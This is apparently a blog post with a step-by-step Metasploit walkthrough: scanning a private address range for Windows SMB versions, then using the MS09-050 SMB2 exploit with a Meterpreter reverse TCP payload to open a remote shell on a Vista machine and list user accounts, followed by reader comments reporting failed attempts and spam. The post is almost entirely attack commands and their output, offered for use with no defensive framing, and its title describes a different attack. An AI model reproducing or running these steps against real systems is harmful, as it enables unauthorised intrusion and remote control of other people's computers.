LFI to RCE via access_log injection

Exploiting Vista SP1 with SMB2 [metasploit]

[o] Exploiting Vista SP1 with SMB2 [metasploit]
[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference


root@evilc0de:~# msfconsole

<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 590 exploits - 302 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10414 updated today (2010.09.21)


msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255
RHOSTS => 172.16.0.1-172.16.4.255
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.0.1-172.16.4.255 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 50 yes The number of concurrent threads

msf auxiliary(smb_version) > run

[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > info

Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Version: 9669
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good

Provided by:
laurent.gaffie
hdm
sf

Available targets:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload information:
Space: 1024

Description:
This module exploits an out of bounds function table dereference in
the SMB request validation code of the SRV2.SYS driver included with
Windows Vista, Windows 7 release candidates (not RTM), and Windows
2008 Server prior to R2. Windows Vista without SP1 does not seem
affected by this flaw.

References:
http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
http://www.securityfocus.com/bid/36299
http://www.osvdb.org/57799
http://seclists.org/fulldisclosure/2009/Sep/0039.html
http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138
RHOST => 172.16.1.138
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12
LHOST => 172.16.1.12
msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.138 yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 172.16.1.12 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 172.16.1.12:4444
[*] Connecting to the target (172.16.1.138:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (748544 bytes) to 172.16.1.138
[*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700

meterpreter > sysinfo
Computer: PUPEN-SNOWBLACK
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > shell
Process 1240 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Aulia Guest
laptop
The command completed with one or more errors.


C:\Windows\system32>

Comments

labatterie said…
The number of seconds to wait for the attack to complete.
I would like to thnkx for the efforts you have put in writing this web site. I am hoping the same high-grade web site post from you in the upcoming as well. Actually your creative writing abilities has encouraged me to get my own site now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.
Anonymous said…
Unfortunately it doesn't work for me. The 180 sec waiting time ends but nothing happens. Any idea?
Unknown said…
I have the same problem. I'm trying to attack Windows Vista SP2 with Backtrack 5 R3. I set everything correctly and I write "exploit". All I get is that:

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 192.168.56.103:4444
[*] Connecting to the target (192.168.56.101:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
msf exploit(ms09_050_smb2_negotiate_func_index) >
Anonymous said…
hi, doesnt seem to work. using windows vista sp1 with metasploit.
per scan target is Windows Vista Home Premium Service Pack 2. at the end getting no responce

[*] Waiting up to 180 seconds for exploit to trigger...
msf exploit(ms09_050_smb2_negotiate_func_index) >

. lan provided by A90-327W15-06 westell modem. firewall and all is off.
Absolute01011 said…
This comment has been removed by the author.
Anonymous said…
Me too, times out after 180 seconds. Exploit never triggers. Vista Business SP2 (Host OS) using BT5R3 on VMware.
Henry Jones said…
Thanks for these commands.. It will be very helpful fo me in exploiting.
assignment help Australia
sifon said…
It's really an amazing article. Thank you for sharing this great blog post. Looking forward for more post. 2264 jamb past questions pdf